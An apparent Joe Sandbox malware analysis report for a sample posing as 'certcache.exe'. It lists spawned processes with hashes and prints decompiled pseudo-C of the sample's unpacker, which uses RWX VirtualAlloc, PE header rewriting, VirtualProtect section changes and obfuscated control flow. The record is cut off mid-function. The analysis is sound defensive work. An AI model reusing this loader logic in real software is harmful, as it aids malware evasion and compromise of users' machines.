Path:C:\Windows\SysWOW64\certcache.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\certcache.exe
Imagebase:0xa10000
File size:135168 bytes
MD5 hash:A992758B24FBB2A2E330558FB14A6DC7
Has administrator privileges:
Programmed in:C, C++ or other language
Reputation:low

General

Start time:21:08:45
Start date:23/01/2018
Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
Wow64 process (32bit):true
Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
Imagebase:0x170000
File size:107192 bytes
MD5 hash:BD2AE15EFB47E5215B4D0C59EA00C91A
Has administrator privileges:
Programmed in:C, C++ or other language
Reputation:low

General

Start time:21:08:46
Start date:23/01/2018
Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
Wow64 process (32bit):false
Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
Imagebase:0x13fce0000
File size:128696 bytes
MD5 hash:30EAABE7A3B1081B6F5DDE4A1C0305D2
Has administrator privileges:
Programmed in:C, C++ or other language
Reputation:low

General

Start time:21:08:47
Start date:23/01/2018
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
Imagebase:0xffa40000
File size:27136 bytes
MD5 hash:C78655BC80301D76ED4FEF1C1EA40A7D
Has administrator privileges:
Programmed in:C, C++ or other language
Reputation:low

General

Start time:21:08:51
Start date:23/01/2018
Path:C:\Windows\System32\sppsvc.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\sppsvc.exe
Imagebase:0xff990000
File size:3524608 bytes
MD5 hash:E17E0188BB90FAE42D83E98707EFA59C
Has administrator privileges:
Programmed in:C, C++ or other language
Reputation:low

General

Start time:21:09:21
Start date:23/01/2018
Path:C:\Windows\System32\wbem\WmiApSrv.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\wbem\WmiApSrv.exe
Imagebase:0xffbf0000
File size:203264 bytes
MD5 hash:38B84C94C5A8AF291ADFEA478AE54F93
Has administrator privileges:
Programmed in:C, C++ or other language
Reputation:low

Disassembly

Code Analysis


    Execution Graph

    Execution Coverage:5.5%
    Dynamic/Decrypted Code Coverage:42.7%
    Signature Coverage:2.4%
    Total number of Nodes:82
    Total number of Limit Nodes:7

    Graph

    [Figure: execution graph, nodes 8312 to 8412. API calls named at its nodes: lstrcmp, CreateMutexW, GetLastError, SetEvent, CloseHandle, memset, CreateProcessW, WaitForSingleObject, GetPEB, GetProcessHeap, RtlAllocateHeap, HeapFree, ExitProcess, IsPwrSuspendAllowed, IsPwrShutdownAllowed, WSACleanup, PdhUpdateLogW, VirtualAlloc, VirtualProtect.]

    Executed Functions

    Control-flow Graph

    C-Code - Quality: 45%
    			E001F16D3() {
    				void* __edi;
    				void* __esi;
    				int _t12;
    				void* _t13;
    
    				memset();
    				 *(_t13 - 0x58) = 0x44;
    				 *((intOrPtr*)(_t13 - 0x2c)) = 0x80;
    				_t12 = CreateProcessW(_t13 - 0x360, 0, 0, 0, 0, 0, 0, 0, _t13 - 0x58, _t13 - 0x14); // executed
    				if(_t12 == 0) {
    					goto 0x330044;
    					asm("int3");
    					asm("int3");
    					return _t12;
    				} else {
    					WaitForSingleObject(__esi, 0xffffffff);
    					CloseHandle( *(__ebp - 0x14));
    					CloseHandle( *(__ebp - 0x10));
    					CloseHandle(__esi);
    					CloseHandle(__edi);
    					_pop(__edi);
    					_pop(__esi);
    					_pop(__ebp);
    					return 1;
    				}
    			}

    APIs
    • memset.NTDLL ref: 001F16D3
    • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 001F1707
    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001F1714
    • CloseHandle.KERNEL32(?), ref: 001F171D
    • CloseHandle.KERNEL32(?), ref: 001F1726
    • CloseHandle.KERNEL32 ref: 001F172D
    • CloseHandle.KERNEL32 ref: 001F1734
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.185212982.00000000001F1000.00000020.sdmp, Offset: 001F0000, based on PE: true
    • Associated: 00000001.00000002.185097485.00000000001F0000.00000002.sdmp
    • Associated: 00000001.00000002.185718938.00000000001FB000.00000002.sdmp
    • Associated: 00000001.00000002.185818082.00000000001FC000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_1f0000_dnscart.jbxd

    Control-flow Graph

    C-Code - Quality: 100%
    			E001F1670(signed int __eax, void* __ebx, void* __esi) {
    				signed int _t38;
    
    				_t38 = __eax %  *(__esi + __ebx - 0x17);
    			}

    APIs
    Memory Dump Source
    • Source File: 00000001.00000002.185212982.00000000001F1000.00000020.sdmp, Offset: 001F0000, based on PE: true
    • Associated: 00000001.00000002.185097485.00000000001F0000.00000002.sdmp
    • Associated: 00000001.00000002.185718938.00000000001FB000.00000002.sdmp
    • Associated: 00000001.00000002.185818082.00000000001FC000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_1f0000_dnscart.jbxd

    Control-flow Graph

    APIs
    • lstrcmp.KERNEL32(face,book), ref: 001E203A
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.184808452.00000000001E0000.00000040.sdmp, Offset: 001E0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_1e0000_dnscart.jbxd

    Control-flow Graph

    C-Code - Quality: 58%
    			E001F9F9D() {
    				void* _t5;
    				void* _t6;
    				void* _t7;
    
    				memset();
    				HeapFree(GetProcessHeap(), 0, _t7); // executed
    				L001F15B0(_t5, _t6); // executed
    				ExitProcess(0);
    			}

    APIs
    Memory Dump Source
    • Source File: 00000001.00000002.185212982.00000000001F1000.00000020.sdmp, Offset: 001F0000, based on PE: true
    • Associated: 00000001.00000002.185097485.00000000001F0000.00000002.sdmp
    • Associated: 00000001.00000002.185718938.00000000001FB000.00000002.sdmp
    • Associated: 00000001.00000002.185818082.00000000001FC000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_1f0000_dnscart.jbxd

    Control-flow Graph

    C-Code - Quality: 52%
    			E001E2663(intOrPtr _a4) {
    				intOrPtr _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				intOrPtr _v32;
    				intOrPtr _v36;
    				char _v40;
    				long _v44;
    				char _v76;
    				intOrPtr _v80;
    				DWORD* _v84;
    				intOrPtr _v88;
    				intOrPtr _v92;
    				intOrPtr* _v96;
    				void* _v100;
    				intOrPtr _v104;
    				intOrPtr* _v108;
    				intOrPtr _v112;
    				intOrPtr _v116;
    				intOrPtr _v120;
    				intOrPtr* _v124;
    				intOrPtr _v128;
    				intOrPtr _v132;
    				intOrPtr _v136;
    				intOrPtr _v140;
    				intOrPtr _v144;
    				int _v148;
    				intOrPtr _v152;
    				intOrPtr _v156;
    				intOrPtr _v160;
    				signed int _v164;
    				signed int _v168;
    				intOrPtr _v172;
    				int _v176;
    				intOrPtr _v180;
    				char _v184;
    				intOrPtr _t100;
    				intOrPtr _t107;
    				intOrPtr _t108;
    				int _t113;
    				int _t131;
    				void* _t135;
    				intOrPtr _t157;
    				intOrPtr _t159;
    				char* _t160;
    				intOrPtr _t161;
    				void* _t164;
    				intOrPtr _t183;
    				unsigned int _t186;
    				intOrPtr _t192;
    				void* _t206;
    				intOrPtr _t210;
    
    				_t100 = _a4;
    				_v44 = 0;
    				_t135 =  *((intOrPtr*)(_t100 + 0x3c));
    				_v184 = _t135;
    				_v180 = _t100;
    				_v80 = _t100;
    				_v84 =  &_v44;
    				_v88 =  *((intOrPtr*)(_t100 + 0x20));
    				_v92 =  *((intOrPtr*)(_t100 + 0x40));
    				_v96 = _t100 + 0x3c;
    				_v100 = _t135;
    				E001E23F0(); // executed
    				E001E188A(_v100);
    				_t210 = _t206 - 8 + 8 - 4 + 4;
    				_t164 = _v100;
    				_t192 =  *((intOrPtr*)(_t164 + 0x3c));
    				_v104 = _t164 + _t192;
    				_v108 = _v100 + 0x3c;
    				_v112 = 0x18;
    				if(_t192 + 0xffffffc0 <= 0xfc0) {
    					_t161 = _v104;
    					_t134 =  ==  ? _t161 + 0x18 : 0x18;
    					_v112 =  ==  ? _t161 + 0x18 : 0x18;
    				}
    				_v116 = _v112;
    				if(_v92 == 0) {
    					L4:
    					_v140 =  *_v96;
    					_v144 = 0;
    					do {
    						_t107 = _v144;
    						 *((char*)(_v140 + _t107)) =  *((intOrPtr*)(_v100 + _t107));
    						_t108 = _t107 + 1;
    						_v144 = _t108;
    					} while (_t108 != 0x400);
    					_t110 =  ==  ? _v100 +  *_v108 : 0;
    					 *((intOrPtr*)(( ==  ? _v100 +  *_v108 : 0) + 0x34)) =  *_v96;
    					_t113 = VirtualProtect(_v100, 0x400, 2,  &_v44); // executed
    					_t183 = _v80;
    					_v40 =  *((intOrPtr*)(_t183 + 0x6c));
    					_v36 =  *((intOrPtr*)(_t183 + 0x70));
    					_v32 =  *((intOrPtr*)(_t183 + 0x74));
    					_v28 =  *((intOrPtr*)(_t183 + 0x68));
    					_v24 =  *((intOrPtr*)(_t183 + 0x64));
    					_v20 = _v100 +  *((intOrPtr*)(_t183 + 0x44));
    					 *((intOrPtr*)(_t210 - 0xc)) = _t183;
    					_v184 = 0;
    					_v180 = 0x78;
    					_v148 = _t113;
    					_v152 = 0;
    					_v156 = 0x78;
    					E001E104C();
    					_t210 =  *((intOrPtr*)( &_v40 + 0x10));
    					goto __eax;
    				} else {
    					_t160 =  &_v76;
    					_t203 =  ==  ? _v104 : 0;
    					_v120 = ( *(( ==  ? _v104 : 0) + 0x14) & 0x0000ffff) + _v116;
    					_v124 = _t160;
    					_v128 = _t160 + 0x10;
    					_v132 = _t160;
    					_v136 = 0;
    					while(1) {
    						_t157 = _v120;
    						_t186 =  *(_t157 + 0x24);
    						_v160 = _v136;
    						_v164 = _t186 >> 0x0000001e & 0x00000001;
    						_v168 = _t186 >> 0x1f;
    						 *_v124 = 1;
    						asm("movaps xmm0, [0x1e40e0]");
    						asm("movups [eax], xmm0");
    						_v172 = _t157;
    						_t131 = VirtualProtect(_v100 +  *((intOrPtr*)(_t157 + 0xc)),  *(_t157 + 8),  *( &_v76 + (_v164 << 4) + (_v168 << 3) + ((_t186 >> 0x0000001d & 0x00000001) << 2)),  &_v44); // executed
    						_t159 = _v160 + 1;
    						_v176 = _t131;
    						_v120 = _v172 + 0x28;
    						_v136 = _t159;
    						if(_t159 == _v92) {
    							goto L4;
    						}
    					}
    					goto L4;
    				}
    			}

    APIs
      • Part of subcall function 001E23F0: VirtualAlloc.KERNELBASE(00000000,00010000,00001000,00000040), ref: 001E2428
    • VirtualProtect.KERNELBASE(?,00000400,00000002,00000000), ref: 001E27B1
    • VirtualProtect.KERNELBASE(?,?,?,00000000), ref: 001E28B6
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.184808452.00000000001E0000.00000040.sdmp, Offset: 001E0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_1e0000_dnscart.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 34 a11490-a114b8 35 a114ba-a11526 34->35 36 a11528-a11541 call a2bfe0 34->36 44 a114bc-a114f8 IsPwrSuspendAllowed 35->44 41 a11597-a115a8 36->41 45 a114fa 44->45 46 a11543-a1155d IsPwrShutdownAllowed 44->46 47 a11563-a11593 WSACleanup 45->47 46->44 46->47 48 a115a9-a115b1 call a295e0 47->48 49 a11595 47->49 51 a115b6-a115c1 48->51 49->41 49->47 51->36 52 a115c7 51->52 52->41
    C-Code - Quality: 37%
    			E00A11490() {
    				void* _v8;
    				char _v16;
    				signed int _v20;
    				signed int _v24;
    				char _v28;
    				intOrPtr _v32;
    				signed int _v36;
    				signed int _v40;
    				intOrPtr _v44;
    				signed int _v48;
    				int _v52;
    				intOrPtr _v56;
    				char _v57;
    				intOrPtr _v64;
    				intOrPtr _v68;
    				intOrPtr _t37;
    				char _t49;
    				void* _t52;
    				intOrPtr _t57;
    				signed int _t66;
    				intOrPtr* _t68;
    
    				_t68 = (_t66 & 0xfffffff8) - 0x40;
    				_v36 = 0x724c9cf2;
    				_v48 = _v40;
    				if(_v36 * 0x4af67b65 <= 0xea54d4c) {
    					L5:
    					_t37 = E00A2BFE0(__eflags); // executed
    					_v32 = 1;
    					_v40 = 0x26a1df5e;
    					_v56 = _t37;
    				} else {
    					_v44 = 0x66c06364;
    					_v52 = AreFileApisANSI();
    					SetFileApisToANSI();
    					SetFileApisToOEM();
    					_v28 = 0x5a4;
    					while(1) {
    						_v40 = _v48 << _v48;
    						_v20 = _v24 << 9;
    						_v24 = 0;
    						_t49 = _v28;
    						_v16 = _t49;
    						L00A2C376(); // executed
    						_v40 = 0;
    						if(_t49 != 0) {
    							break;
    						}
    						L00A2C37C(); // executed
    						_t57 = _v16 + 0xffffffff;
    						_v28 = _t57;
    						__eflags = _t57 - 0x59b;
    						_v57 = _t49;
    						if(_t57 != 0x59b) {
    							continue;
    						} else {
    							goto L7;
    						}
    						while(1) {
    							L7:
    							_v64 = 0x47fd703f;
    							L00A2C3A0();
    							_v20 = _v20;
    							_v24 = _v24;
    							_v68 = 0x47fd703f;
    							if(_v64 <= _v44) {
    								break;
    							}
    						}
    						 *_t68 = DragAcceptFiles; // executed
    						_t52 = E00A295E0(); // executed
    						_v32 = 0xffffffff;
    						__eflags = _t52;
    						if(__eflags == 0) {
    							goto L5;
    						} else {
    						}
    						goto L9;
    					}
    					goto L7;
    				}
    				L9:
    				_v40 = 0x5d24a093;
    				return _v32;
    			}

    APIs
    • IsPwrSuspendAllowed.POWRPROF ref: 00A114E7
    • IsPwrShutdownAllowed.POWRPROF ref: 00A11543
    • WSACleanup.WS2_32 ref: 00A1156C
      • Part of subcall function 00A295E0: IsPwrSuspendAllowed.POWRPROF(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,66C06364), ref: 00A2969B
    Memory Dump Source
    • Source File: 00000001.00000002.189109573.0000000000A11000.00000020.sdmp, Offset: 00A10000, based on PE: true
    • Associated: 00000001.00000002.189092931.0000000000A10000.00000002.sdmp
    • Associated: 00000001.00000002.189181189.0000000000A2D000.00000004.sdmp
    • Associated: 00000001.00000002.189194686.0000000000A2F000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_a10000_dnscart.jbxd

    Control-flow Graph

    C-Code - Quality: 47%
    			E001F9F42() {
    				void* _t6;
    				void* _t11;
    				void* _t12;
    				void* _t18;
    				void* _t19;
    				void* _t20;
    
    				L001F1B10(E001F1BE0(_t11, _t12, _t18, _t19), 0x1f11f0, _t18, _t19);
    				_push(0x1fc0d0);
    				_push(0x64df2dad);
    				_push(0x48);
    				_t15 = E001F1BE0(_t11, 0x8f7ee672, _t18, _t19);
    				L001F1B10(_t3, 0x1f10d0, _t18, _t19);
    				_t6 = RtlAllocateHeap(GetProcessHeap(), 0, 0x8000000); // executed
    				_t20 = _t6;
    				if(_t20 == 0) {
    					L3:
    					ExitProcess(0);
    				}
    				goto 0x331d52;
    				asm("int3");
    				asm("int3");
    				asm("int3");
    				memset();
    				HeapFree(GetProcessHeap(), 0, _t20); // executed
    				L001F15B0(_t11, _t15); // executed
    				goto L3;
    			}

    APIs
    • GetProcessHeap.KERNEL32(00000000,08000000), ref: 001F9F82
    • RtlAllocateHeap.NTDLL(00000000), ref: 001F9F89
    • ExitProcess.KERNEL32 ref: 001F9FBD
    Memory Dump Source
    • Source File: 00000001.00000002.185212982.00000000001F1000.00000020.sdmp, Offset: 001F0000, based on PE: true
    • Associated: 00000001.00000002.185097485.00000000001F0000.00000002.sdmp
    • Associated: 00000001.00000002.185718938.00000000001FB000.00000002.sdmp
    • Associated: 00000001.00000002.185818082.00000000001FC000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_1f0000_dnscart.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 64 a295e0-a2965a 65 a2965c-a29685 call a296c0 64->65 66 a2969b-a296a4 IsPwrSuspendAllowed call a299f0 64->66 65->66 72 a29687-a2969a 65->72 70 a296a9-a296b9 66->70 70->72
    C-Code - Quality: 37%
    			E00A295E0(char _a4) {
    				void* _v16;
    				signed int _v24;
    				signed int _v28;
    				signed int _v32;
    				intOrPtr _v36;
    				signed int _v40;
    				intOrPtr _v44;
    				intOrPtr _v48;
    				char _v52;
    				signed int _v56;
    				intOrPtr _v60;
    				intOrPtr _v64;
    				signed int _v68;
    				signed int _v72;
    				char _v73;
    				char _t30;
    				signed int _t37;
    				signed int _t46;
    				signed int _t49;
    				intOrPtr* _t51;
    
    				_t51 = (_t49 & 0xfffffff8) - 0x40;
    				_t30 = _a4;
    				_t37 = _v24;
    				_v24 = 0x39637a74;
    				_v28 = 0;
    				_v32 = 0x4409d84c;
    				_v36 = 0x77a6fdfb;
    				_v44 = 0;
    				_v48 = 0x16c1778c;
    				_v24 = _t37 + 0x6a70436f;
    				_t46 = _v32 ^ 0xa4617aa1 | _v28;
    				_v52 = _t30;
    				_v56 = _t37;
    				_v60 = 0x16c1778c;
    				_v64 = 0;
    				_v68 = _t46;
    				if(_t46 == 0) {
    					L4:
    					L00A2C376(); // executed
    					_v73 = _t30;
    					_v40 = (_t37 & 0xffffff00 | E00A299F0(__eflags) != 0x00000000) & 1;
    				} else {
    					 *_t51 = _v52;
    					_v72 = _v36 + 0x88590205;
    					_t30 = E00A296C0();
    					_v40 = 1;
    					_t37 = _v72;
    					if(_t30 == _t37) {
    						goto L4;
    					}
    				}
    				_v24 = _v56;
    				return _v40; // executed
    			}

    APIs
    • IsPwrSuspendAllowed.POWRPROF(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,66C06364), ref: 00A2969B
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.189109573.0000000000A11000.00000020.sdmp, Offset: 00A10000, based on PE: true
    • Associated: 00000001.00000002.189092931.0000000000A10000.00000002.sdmp
    • Associated: 00000001.00000002.189181189.0000000000A2D000.00000004.sdmp
    • Associated: 00000001.00000002.189194686.0000000000A2F000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_a10000_dnscart.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 814 a2b160-a2b19f 815 a2b1a3-a2b208 814->815 816 a2b292-a2b305 call a2ab60 call a2a5c0 VirtualAlloc 815->816 817 a2b20e 815->817 822 a2b309-a2b3e3 call a2b3f0 816->822 817->815 825 a2b210-a2b291 call a2ac00 822->825 826 a2b3e9 822->826 826->822
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.189109573.0000000000A11000.00000020.sdmp, Offset: 00A10000, based on PE: true
    • Associated: 00000001.00000002.189092931.0000000000A10000.00000002.sdmp
    • Associated: 00000001.00000002.189181189.0000000000A2D000.00000004.sdmp
    • Associated: 00000001.00000002.189194686.0000000000A2F000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_a10000_dnscart.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 829 1e23f0-1e24bc VirtualAlloc 830 1e24c9-1e259f 829->830 831 1e25a5-1e25ce 830->831 831->831 832 1e25d0-1e2658 call 1e21ac 831->832 835 1e24be-1e24c8 832->835 836 1e265e 832->836 836->830
    C-Code - Quality: 30%
    			E001E23F0(intOrPtr _a4, void* _a8) {
    				char _v21;
    				char _v26;
    				char _v31;
    				intOrPtr* _v36;
    				intOrPtr _v40;
    				intOrPtr* _v44;
    				intOrPtr* _v48;
    				void** _v52;
    				char* _v56;
    				intOrPtr _v60;
    				intOrPtr _v64;
    				intOrPtr _v68;
    				intOrPtr* _v72;
    				intOrPtr* _v76;
    				intOrPtr* _v80;
    				void** _v84;
    				char* _v88;
    				intOrPtr _v92;
    				intOrPtr _v96;
    				char* _v100;
    				intOrPtr _v104;
    				signed int _v108;
    				signed int _v112;
    				intOrPtr _v116;
    				intOrPtr _v120;
    				intOrPtr _v124;
    				intOrPtr _v128;
    				intOrPtr _v132;
    				intOrPtr _v136;
    				intOrPtr _v140;
    				intOrPtr _v144;
    				intOrPtr _v148;
    				intOrPtr _v152;
    				intOrPtr _v156;
    				intOrPtr _v160;
    				intOrPtr _v164;
    				void* _t121;
    				intOrPtr _t143;
    				intOrPtr _t148;
    				intOrPtr _t157;
    				intOrPtr _t158;
    				void* _t162;
    				intOrPtr _t164;
    				intOrPtr _t167;
    				char* _t168;
    				void** _t173;
    				void* _t178;
    				intOrPtr _t191;
    				intOrPtr _t197;
    				intOrPtr _t214;
    				intOrPtr _t217;
    				intOrPtr* _t223;
    				void** _t232;
    				char* _t234;
    				void* _t243;
    				intOrPtr* _t244;
    
    				_v36 =  &_v21;
    				_v40 = _a4;
    				_v44 =  &_v31;
    				_v48 =  &_v26;
    				_t121 = VirtualAlloc(0, 0x10000, 0x1000, 0x40); // executed
    				_t234 =  &_v21;
    				_t168 =  &_v26;
    				_v52 = _t121;
    				_v56 =  &_v31;
    				 *_v52 = 0;
    				_v60 =  *((intOrPtr*)(_v40 + 0x3c));
    				_v64 = 4;
    				_v68 = _v40 + _v60;
    				_t130 =  ==  ? _v68 : 0;
    				_v72 = _v56 + 1;
    				_v76 = _t168 + 1;
    				_v80 = _t234 + 1;
    				_v84 =  &(_v52[1]);
    				_v88 = _t168;
    				_v92 = _v40 -  *((intOrPtr*)(( ==  ? _v68 : 0) + 0x34));
    				_v96 = _v64;
    				_v100 = _t234;
    				_v104 = 0xfffffffb - _v52;
    				_v108 = 0;
    				while(1) {
    					_t191 = _v96;
    					_v112 = _v108;
    					_v116 = _t191;
    					_t143 = _t191 + _v52;
    					 *_v56 = 0xe8;
    					 *_v72 = 0x1e2194 - _t143;
    					_t173 = _v52;
    					_v120 = _t143;
    					 *((intOrPtr*)(_t173 + _v116)) =  *_v44;
    					_t197 = _v116;
    					 *((char*)(_t173 + _t197 + 4)) =  *((intOrPtr*)(_v44 + 4));
    					_t148 =  *((intOrPtr*)(0x1e305c + _v112 * 0xc + 4));
    					_v124 = _t148;
    					_t178 = _t148 + _v40;
    					 *_v88 = 0xe9;
    					_v128 = _v120 + 0xfffffffb - _t178;
    					_v132 = _t197 + 5;
    					 *_v76 = _v128;
    					 *_v100 = 0xe9;
    					 *_v80 = _v104 + 0xfffffffb - _v116 + _t178;
    					_v136 =  *((intOrPtr*)(0x1e305c + _v112 * 0xc + 8));
    					_v140 =  *((intOrPtr*)(0x1e305c + _v112 * 0xc));
    					_v144 = _v52 + _v132;
    					_v148 = 0;
    					do {
    						_t157 = _v148;
    						 *((char*)(_v144 + _t157)) =  *((intOrPtr*)(_v140 + _t157));
    						_t158 = _t157 + 1;
    						_v148 = _t158;
    					} while (_t158 != _v136);
    					_t244 = _t243 - 0x14;
    					 *_t244 = _v40;
    					_v164 = _v92;
    					_v160 = _v124;
    					_v156 = _v136;
    					_v152 = _v144;
    					E001E21AC();
    					_t243 = _t244 + 0x14;
    					_t162 = _v116 + _v136;
    					_t223 = _v36;
    					_t232 = _v84;
    					 *((intOrPtr*)(_t232 + _t162)) =  *_t223;
    					 *((char*)(_t232 + _t162 + 4)) =  *((intOrPtr*)(_t223 + 4));
    					_t164 = _v40;
    					_t214 = _v124;
    					 *((intOrPtr*)(_t164 + _t214)) =  *_v48;
    					 *((char*)(_t164 + _t214 + 4)) =  *((intOrPtr*)(_v48 + 4));
    					_t167 = _v116 + 0xe + _v136;
    					_t217 = _v112 + 1;
    					_v96 = _t167;
    					_v108 = _t217;
    					if(_t217 != 0x160) {
    						continue;
    					}
    					return _t167;
    				}
    			}

    APIs
    • VirtualAlloc.KERNELBASE(00000000,00010000,00001000,00000040), ref: 001E2428
    Memory Dump Source
    • Source File: 00000001.00000002.184808452.00000000001E0000.00000040.sdmp, Offset: 001E0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_1e0000_dnscart.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 837 a2bdb0-a2bee3 call a11100 call a2ab60 call a2a5c0 call a11100 846 a2bee5 837->846 847 a2bf54-a2bf5f 837->847 848 a2bf83-a2bfcf VirtualAlloc 846->848 848->847 849 a2bfd1 call a2b950 848->849 849->848 853 a2bf52-a2bf81 849->853 853->847
    APIs
    Memory Dump Source
    • Source File: 00000001.00000002.189109573.0000000000A11000.00000020.sdmp, Offset: 00A10000, based on PE: true
    • Associated: 00000001.00000002.189092931.0000000000A10000.00000002.sdmp
    • Associated: 00000001.00000002.189181189.0000000000A2D000.00000004.sdmp
    • Associated: 00000001.00000002.189194686.0000000000A2F000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_a10000_dnscart.jbxd

    Control-flow Graph

    APIs
    Memory Dump Source
    • Source File: 00000001.00000002.184808452.00000000001E0000.00000040.sdmp, Offset: 001E0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_1e0000_dnscart.jbxd

    Non-executed Functions

    APIs
    Memory Dump Source
    • Source File: 00000001.00000002.185212982.00000000001F1000.00000020.sdmp, Offset: 001F0000, based on PE: true
    • Associated: 00000001.00000002.185097485.00000000001F0000.00000002.sdmp
    • Associated: 00000001.00000002.185718938.00000000001FB000.00000002.sdmp
    • Associated: 00000001.00000002.185818082.00000000001FC000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_1f0000_dnscart.jbxd
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.184808452.00000000001E0000.00000040.sdmp, Offset: 001E0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_1e0000_dnscart.jbxd
    C-Code - Quality: 50%
    			E001F2E6A(void* __ebx, void* __fp0) {
    				signed int _t1688;
    				signed int _t1692;
    				void* _t2075;
    				signed int _t2086;
    				signed int _t2465;
    				void* _t2870;
    
    				_t2075 = __ebx;
    				 *(_t2870 - 0x1c) = 0xffffffff;
    				 *(_t2870 - 4) =  *(_t2870 + 0xc);
    				 *((intOrPtr*)(_t2870 - 0x18)) =  *(_t2870 + 0xc) +  *( *(_t2870 + 0x10));
    				 *(_t2870 - 0x14) =  *(_t2870 + 0x18);
    				 *((intOrPtr*)(_t2870 - 0x70)) =  *(_t2870 + 0x18) +  *( *(_t2870 + 0x1c));
    				if(( *(_t2870 + 0x20) & 0x00000004) == 0) {
    					 *(_t2870 - 0xf0) =  *(_t2870 + 0x18) -  *((intOrPtr*)(_t2870 + 0x14)) +  *( *(_t2870 + 0x1c)) - 1;
    				} else {
    					 *(_t2870 - 0xf0) = 0xffffffff;
    				}
    				 *(_t2870 - 0x88) =  *(_t2870 - 0xf0);
    				if(( *(_t2870 - 0x88) + 0x00000001 &  *(_t2870 - 0x88)) != 0 ||  *(_t2870 + 0x18) <  *((intOrPtr*)(_t2870 + 0x14))) {
    					 *( *(_t2870 + 0x1c)) = 0;
    					 *( *(_t2870 + 0x10)) = 0;
    					_t1688 = 0xfffffffd;
    				} else {
    					 *(_t2870 - 8) =  *( *(_t2870 + 8) + 4);
    					 *(_t2870 - 0xc) =  *( *(_t2870 + 8) + 0x38);
    					 *(_t2870 - 0x28) =  *( *(_t2870 + 8) + 0x20);
    					 *(_t2870 - 0x10) =  *( *(_t2870 + 8) + 0x24);
    					 *(_t2870 - 0x24) =  *( *(_t2870 + 8) + 0x28);
    					_t1692 =  *( *(_t2870 + 8) + 0x3c);
    					 *(_t2870 - 0x7c) = _t1692;
    					_t2086 =  *(_t2870 + 8);
    					_t2465 =  *_t2086;
    					 *(_t2870 - 0xf8) = _t2465;
    					if( *(_t2870 - 0xf8) <= 0x35) {
    						_t50 =  *(_t2870 - 0xf8) + 0x1f55b0; // 0xcccccc20
    						switch( *((intOrPtr*)(( *_t50 & 0x000000ff) * 4 +  &M001F5528))) {
    							case 0:
    								 *( *(_t2870 + 8) + 0xc) = 0;
    								 *( *(_t2870 + 8) + 8) = 0;
    								 *(_t2870 - 0x24) = 0;
    								 *(_t2870 - 0x10) =  *(_t2870 - 0x24);
    								 *(_t2870 - 0x28) =  *(_t2870 - 0x10);
    								 *(_t2870 - 8) =  *(_t2870 - 0x28);
    								 *(_t2870 - 0xc) =  *(_t2870 - 8);
    								 *( *(_t2870 + 8) + 0x1c) = 1;
    								 *( *(_t2870 + 8) + 0x10) = 1;
    								if(( *(_t2870 + 0x20) & 0x00000001) == 0) {
    									goto L48;
    								} else {
    									goto L9;
    								}
    								goto L600;
    							case 1:
    								if(0 != 0) {
    									L11:
    									 *(_t2870 - 0x1c) = 1;
    									_t2086 =  *(_t2870 + 8);
    									 *_t2086 = 1;
    								} else {
    									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
    										goto L10;
    									} else {
    										 *( *((intOrPtr*)(__ebp + 8)) + 8) =  *( *(__ebp - 4)) & 0x000000ff;
    										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
    										L18:
    										L20:
    										if(0 != 0) {
    											L9:
    											_t2465 =  *(_t2870 - 4);
    											if(_t2465 <  *((intOrPtr*)(_t2870 - 0x18))) {
    												 *( *(_t2870 + 8) + 8) =  *( *(_t2870 - 4)) & 0x000000ff;
    												 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
    												goto L20;
    											} else {
    												L10:
    												_t1692 =  *(_t2870 + 0x20) & 0x00000002;
    												if(_t1692 == 0) {
    													 *( *(_t2870 + 8) + 8) = 0;
    													goto L18;
    												} else {
    													goto L11;
    												}
    											}
    										} else {
    											goto L21;
    										}
    									}
    								}
    								goto L600;
